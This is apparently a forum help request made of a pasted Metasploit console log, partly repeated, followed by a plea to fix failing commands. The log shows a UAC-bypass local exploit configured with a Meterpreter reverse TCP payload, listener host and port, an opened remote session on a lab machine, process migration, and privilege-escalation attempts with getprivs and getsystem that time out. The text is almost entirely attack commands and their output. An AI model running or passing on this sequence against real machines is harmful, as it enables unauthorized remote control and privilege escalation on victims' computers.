[*] Started reverse TCP handler on 192.168.244.136:8644
] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[] Uploaded the agent to the filesystem....
[] Uploading the bypass UAC executable to the filesystem...
[] Meterpreter stager executable 73802 bytes long being uploaded..
[] Sending stage (179267 bytes) to 192.168.244.137
[] Meterpreter session 2 opened (192.168.244.136:8644 -> 192.168.244.137:49160) at 2018-01-08 21:41:54 +0530
meterpreter > background [*] Backgrounding session 1... msf exploit(handler) > use exploit/windows/local/bypassuac msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(bypassuac) > set LHOST 192.168.244.136 LHOST => 192.168.244.136 msf exploit(bypassuac) > set SESSION 1 SESSION => 1 msf exploit(bypassuac) > set LPORT 8644 LPORT => 8644 msf exploit(bypassuac) > exploit
[*] Started reverse TCP handler on 192.168.244.136:8644
] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [+] Part of Administrators group! Continuing... [] Uploaded the agent to the filesystem.... [] Uploading the bypass UAC executable to the filesystem... [] Meterpreter stager executable 73802 bytes long being uploaded.. [] Sending stage (179267 bytes) to 192.168.244.137 [] Meterpreter session 2 opened (192.168.244.136:8644 -> 192.168.244.137:49160) at 2018-01-08 21:41:54 +0530
meterpreter > migrate 1480 [] Migrating from 3928 to 1480... [] Migration completed successfully. meterpreter > getprivs [-] Error running command getprivs: Rex::TimeoutError Operation timed out. meterpreter > getsystem [-] Error running command getsystem: Rex::TimeoutError Operation timed out.
the getsystem as well as getprivs commands are not working please help us !